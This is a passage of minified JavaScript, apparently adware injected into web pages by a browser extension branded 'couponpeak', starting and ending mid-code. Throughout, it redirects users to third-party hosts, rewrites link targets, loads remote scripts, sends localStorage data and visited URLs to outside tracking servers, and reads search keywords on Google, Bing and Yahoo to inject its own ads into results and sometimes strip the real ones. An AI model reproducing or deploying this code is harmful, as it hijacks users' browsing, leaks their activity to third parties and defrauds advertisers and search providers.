cher.ehomestudy.com fw.adsafeprotected.com ad.improvemedianetwork.com cmen.197865.com track.btmobm.com media.glispa.com\".indexOf(window.self.location.hostname)==-1 && adzy653rk.location.indexOf(\"zoneid=506761\")==-1 && adzy653rk.location.indexOf(\"zoneid=511181\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 && adzy653rk.location.indexOf(\"1018-1005\")==-1 && adzy653rk.location.indexOf(\"1019-1001\")==-1 && adzy653rk.location.indexOf(\"PT1312\")==-1) adzy653rk.init()})();(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"5wVbM0aE=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"5wVbM0aE=\")){var d=a.match(/5wVbM0aE=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd97pdsMCyVUojwMDMlGC7VLBT94tMtGB6DHhfs0rShNAen0rchOAen0rjCFrHC9qHk6qHYHqTk9rHr8rjU=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){try{if(window.opener&&window.self==window.top&&(!window.name.match(/^(a652c|ld893)_/))&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&-1==document.referrer.indexOf('/sd/dw32.html')&&-1==document.referrer.indexOf('/pop/1.1.00')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/sd/dw32.html')&&-1==window.self.location.href.indexOf('/pop/1.1.00')&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://stylene.net/z/?f=pjYKrTn6vTs8rG59qV1Fqdw8qjn5rjCE&eid=682&hid=17137475778365433519&pid=1&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild(b),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild(b))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://stylene.net/x/?f=pjYKrTn6vTs8rG59qV1Fqdw8qjn5rjCE&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://stylene.net/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://stylene.net/x/?f=pjYKrTn6vTs8rG59qV1Fqdw8qjn5rjCE&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://stylene.net/x/?f=pjYKrTn6vTs8rG59qV1Fqdw8qjn5rjCE&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://stylene.net/z/?f=pjYKrTn6vTs8rG59qV1Fqdw8qjn5rjCE&eid=682&hid=17137475778365433519&pid=1&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};;(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://superiends.org/e/?f=pjYKrTn6vTs8rG59qV1Fqdw8qjn5rjCE&eid=682&hid=17137475778365433519&pid=1&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=511181&ext=couponpeak&systemid=17137475778365433519&ext=couponpeak\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=682_1&hid=17137475778365433519&bname=couponpeak\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=682_1&hid=17137475778365433519&bname=couponpeak\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=511181&ext=couponpeak&systemid=17137475778365433519&ext=couponpeak\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5.p\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"couponpeak\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var f=a[e];b=new Image;b.src=f}else b=new Image,b.src=a};a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+ c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c[b];\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c, b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a); Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f= this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"== navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href: \"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=17137475778365433519&eid=682&pid=1&prodid=316&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+ b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()}, !1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}}; var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]= d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert|| \"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&& (a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}}; b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector, e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)\"string\"===typeof a[b]&&(a[b]=a[b].replace(/\\\"/g,'\\\\\"'));return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a); d=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(var e=0;e<d.length;e++)a=a.replace(RegExp(\"\\\\[##\"+d[e].replace+\"##\\\\]\",\"g\"),d[e][\"with\"]);try{return\"undefined\"!==typeof c.pxl&&\"\"!==c.pxl&&b.utils.sendPixels(c.pxl),JSON.parse(a)}catch(f){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d, c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k[b]))return k[b];return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&& __yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var p=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=l(a.inserts[b].selector),\"undefined\"!==typeof a.element){a.insert=a.inserts[b].at; break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left=!1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(var e=0;e<b.num_of_items_in_one&&0!=c.length;e++){var f=b.get_item_json(a,c[0]);try{b.insert_point.children.push(f)}catch(g){b.insert_point=d,b.insert_point.children.push(f)}\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()}};b.addEventsToItems= function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(p);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var h=l(f.inserts[g].selector);\"undefined\"!==typeof h&&d.push(h)}}for(e=0;e<d.length;e++)if(\"undefined\"== typeof d[e]){var k=this;p=setTimeout(function(){k.apply(k,arguments)},200)}b()};b.addExtensionName=function(a){var c=JSON.stringify(a.layouts.dom);if(!c.match(/\\[##eid##\\]/))return a;c=c.replace(/\\[##eid##\\]/g,b.eid);a.layouts.dom=JSON.parse©;return a};b.loop_targets=function(a,c,d){if(a instanceof Object&&(b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a=b.addExtensionName(a)}catch(e){}try{a.node= b.create_search(a)}catch(f){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var d=a[c];d.outerHTML=d.outerHTML.replace(/href\\=/ig,\"_href=\")}},20)},!1,a[c],!0)};b.addCloseFunctionality=function(){function a(a){for(var b=a.className.split(\" \"),c=0;c<b.length;c++)if(\"yael\"===b[c])return a; if(!a.parentElement)return!1;a=a.parentElement;return arguments.callee(a)}var c=b.utils.query_selector_all(\".yael_close_btn\");if©for(var d=0;d<c.length;d++)b.events.add(\"click\",function(){try{var b=a(this)}catch©{}b&&b.parentElement.removeChild(b)},!1,c[d],\"closeBtn\")};b.inject_search=function(){b.not_unique_items=[];0!=__yael_res.data.items.length&&(b.setClickHref(__yael_res.data.items[0].clickUrl,b.projects_name),b.check_if_div_in_dom(0,function(){for(var a in __yael_res.config.targets){var c= __yael_res.config.targets[a];b.loop_targets(c,__yael_res.data.items,c.layouts.unique)}\"function\"==typeof b.projects_info[b.projects_name].tweak&&b.projects_info[b.projects_name].tweak();b.j||b.removeSecondClick();b.addCloseFunctionality();b.utils.flushWaitForTokens()}))};b.init_search_project=function(){b.waitForElementCounter=0;\"undefined\"!=typeof __yael&&b.remove_search();for(var a in b.projects_info)if(b.utils.match_url(location.href,b.projects_info[a].urls)){var c=b.projects_info[a];b.projects_name= a;if(-1<b.initThrottle.indexOf(a))c.validate(function(){c.name=b.projects_name;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})});else{if(!c.validate())return;c.name=b.projects_name;b.projects_name=a;b.get_keyword(c,function(a,c){b.jsonp_request(a,c)})}}return!1};b.get_keyword=function(a,c){var d=a.src_for_keyword,e=function(d){b.inputElement=d[0];b.keyword=b.inputElement.value;if(2>b.keyword.length)return b.utils.flushWaitForTokens(),!1;if(b.inputElement&&\"input\"==b.inputElement.tagName.toLowerCase()&& \"\"!==b.keyword)return c(b.keyword,a.name)};if(d instanceof Array)for(var f=0;f<d.length;f++)b.utils.waitForElement(d[f],function(a){a&&e(a)},100,\"keyword\");else b.utils.waitForElement(d,function(a){a&&e(a)},100,\"keyword\")};b.remove_se_handler=function(a){var c=b.projects_info[a].dr;if(c instanceof Array)if(\"bing\"==a)for(c=b.utils.query_selector_all(c[0]),a=0;a<c.length;a++)b.remove_se(c[a]);else for(a=0;a<c.length;a++){var d=l(c[a]);b.remove_se(d)}};b.remove_se=function(a){a&&a.parentElement.removeChild(a)}; b.jsonp_request=function(a,c){var d=b.num_of_items_in_one*parseInt(b.projects_info[c].unique_search_divs);window.__yael_cb=function(a){window.__yael_res=a;\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens():(0==__yael.utils.getRandomInt(0,10)&&b.remove_se_handler©,__yael.inject_search())};\"undefined\"==typeof window.__yael&&(window.__yael=b);d=b.jsonpHost+\"/?v=\"+b.version+\"&p=\"+c+\"&keyword=\"+a+\"&numItems=\"+d+\"&hid=17137475778365433519&eid=682&pid=1&prid=316\"; \"undefined\"!=typeof specificFeeds&&specificFeeds instanceof Array&&(d+=\"&_feeds=\"+specificFeeds.join(\",\"));if(b.utils.isIE()){if(document.getElementById(\"__yael_script\")){var e=document.getElementById(\"__yael_script\");e.parentNode.removeChild(e)}e=document.createElement(\"script\");e.id=\"__yael_script\";e.src=\"//\"+d+\"&domvar=__yael_cb\";e.type=\"text/javascript\";b.utils.addScript(e,c)}else b.utils.ajax.get(\"//\"+d,function(a){window.__yael_res=JSON.parse(a);\"0\"==__yael_res.data.numberOfItems?b.utils.flushWaitForTokens(): (0==__yael.utils.getRandomInt(0,10)&&__yael.remove_se_handler©,__yael.inject_search())})};\"undefined\"==typeof __yael&&b.init_search_project();-1<b.initThrottle.indexOf(b.projects_name)&&b.events.add(\"keyup\",b.utils.throttle(b.init_search_project,3E3),!1,b.inputElement,!1)}}); ;if(window.self==window.top){var 